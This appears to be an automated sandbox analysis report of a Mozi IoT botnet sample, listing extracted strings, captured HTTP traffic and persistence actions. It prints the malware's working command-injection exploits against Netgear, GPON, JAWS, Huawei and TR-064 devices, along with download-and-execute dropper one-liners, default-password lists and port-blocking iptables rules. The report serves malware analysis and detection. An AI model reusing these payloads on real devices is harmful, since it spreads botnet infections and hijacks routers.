Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.12.dr String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.12.dr String found in binary or memory: http://127.0.0.1
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://HTTP/1.1
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.12.dr String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.12.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.12.dr String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca/upload.php
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.219.131.213:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 162.209.132.128:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 148.229.1.12:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 205.198.160.107:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.25.119.143:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 171.25.175.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.35.5.125:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.58.36.209:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.173.33.241:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.6.123.60:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.215.82.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.32.54.199:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.44.16.109:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.142.213.80:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 87.17.124.195:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Spam, unwanted Advertisements and Ransom Demands

Source: /tmp/Mozi.m.3 (PID: 5224) HTML file containing JavaScript created: /usr/networks

System Summary

Source: Mozi.m.3, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: classification engine Classification label: mal100.spre.troj.evad.lin3@0/486@5/0

Persistence and Installation Behavior

Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/im-config_wayland.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/gawk.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/01-locale-fix.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z99-cloudinit-warnings.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/vte-2.91.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z99-cloud-locale-test.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/xdg_dirs_desktop_session.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/bash_completion.sh
Source: /tmp/Mozi.m.3 (PID: 5224) File: /proc/5224/mounts
Source: /bin/sh (PID: 5229) Killall command executed: killall -9 telnetd utelnetd scfgmgr
Source: /tmp/Mozi.m.3 (PID: 5224) File written: /usr/networks
Source: /tmp/Mozi.m.3 (PID: 5224) Shell script file created: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m.3 (PID: 5224) Shell script file created: /etc/init.d/S95baby.sh
Source: /tmp/Mozi.m.3 (PID: 5238) Reads from proc file: /proc/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5145/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1582/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/3088/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/110/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/111/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1579/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/112/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1699/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/113/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1335/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1698/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/114/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/235/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1334/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1576/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2302/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/115/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/236/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/116/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/237/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/117/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/118/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/910/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/119/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/912/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2307/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/918/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5152/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5155/stat
Source: /usr/bin/killall (PID: 5229) File opened: /proc/16/stat
